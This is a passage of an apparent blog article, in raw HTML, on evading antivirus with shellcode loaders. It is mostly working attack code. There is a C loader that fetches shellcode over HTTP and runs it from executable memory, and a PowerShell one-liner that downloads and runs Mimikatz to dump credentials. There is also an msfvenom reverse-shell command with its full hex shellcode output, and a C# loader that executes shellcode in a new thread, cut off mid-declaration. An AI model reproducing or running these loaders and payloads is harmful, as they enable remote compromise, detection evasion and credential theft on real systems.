            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Out of memory&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;WinHttpReadData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwDownloaded&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Error %u in WinHttpReadData.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"ok"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;code_length&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;strlen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;calloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;code_length&lt;/span&gt;  &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;code_length&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
                &lt;span class="n"&gt;sscanf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%2hhx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
                &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;memcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)())&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
            &lt;span class="k"&gt;delete&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;dwDownloaded&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"pause"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8b2006bftwz53xqpjurj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8b2006bftwz53xqpjurj.png" alt="Figure 4: HTTP-based shellcode retrieval implementation" width="800" height="524"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 4: HTTP-based shellcode retrieval implementation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Examining the detection results: after removing the embedded shellcode, Antivirus no longer flags the executable.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fj0g5gy93z2jplzdhxfgg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fj0g5gy93z2jplzdhxfgg.png" alt="Figure 5: Detection results after shellcode separation" width="800" height="268"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 5: Detection results after shellcode separation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Numerous similar remote-loading techniques exist, such as PowerShell in-memory loading—a method with which many practitioners are undoubtedly familiar.&lt;/p&gt;

&lt;p&gt;For instance, PowerShell can be used to remotely load Mimikatz for credential extraction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;IEX&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;New-Object&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Net.WebClient&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;DownloadString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Invoke-Mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;c:\1.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fe7wh19kzyccqh3v9v340.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fe7wh19kzyccqh3v9v340.png" alt="Figure 6: PowerShell remote loading example" width="800" height="269"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 6: PowerShell remote loading example
  &lt;p&gt;&lt;/p&gt;




&lt;p&gt;While many such techniques are widely used, certain in-memory loading methods are still intercepted by some antivirus solutions. We shall address this issue later in the article.&lt;/p&gt;

&lt;p&gt;At this juncture, the underlying principle of language-based loaders should be self-evident. Nonetheless, I shall offer an explanation, drawing upon my colleague's analogy:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Shellcode is analogous to water; a loader serves as the vessel that contains it. Just as water must be poured into a cup before it can be consumed, shellcode must be loaded by a loader before it can be executed.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  A) Loaders for Executing Shellcode
&lt;/h3&gt;

&lt;h4&gt;
  
  
  SSI (Shellcode String Injection):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; Windows &lt;span class="nt"&gt;-p&lt;/span&gt; windows/meterpreter/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.142 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-f&lt;/span&gt; c &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; msf.txt
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of c file: 1457 bytes
&lt;span class="nb"&gt;cat &lt;/span&gt;msf.txt|grep &lt;span class="nt"&gt;-v&lt;/span&gt; unsigned|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\"\\\x&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\\\x&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s1"&gt;':a;N;$!ba;s/\n//g'&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/;//g"&lt;/span&gt;

fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a68c0a8ae84680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgu0heke688vy7xu64ijn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgu0heke688vy7xu64ijn.png" alt="Figure 7: MSFVenom shellcode generation output" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 7: MSFVenom shellcode generation output
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8v8o3aieo73v7tkjvkq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8v8o3aieo73v7tkjvkq.png" alt="Figure 8: SSI loader execution example" width="799" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 8: SSI loader execution example
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Shellcode Launcher:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fujm7d3rc9g1i8v7agraz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fujm7d3rc9g1i8v7agraz.png" alt="Figure 9: Shellcode Launcher tool interface" width="800" height="237"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 9: Shellcode Launcher tool interface
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  C# Loader:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;TCPMeterpreterProcess&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// native function's compiled code&lt;/span&gt;
            &lt;span class="c1"&gt;// generated with metasploit&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;333&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;

            &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;// prepare data&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;// execute native code&lt;/span&gt;
            &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0xFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flAllocationType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flProtect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;VirtualFree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;lpAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwFreeType&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
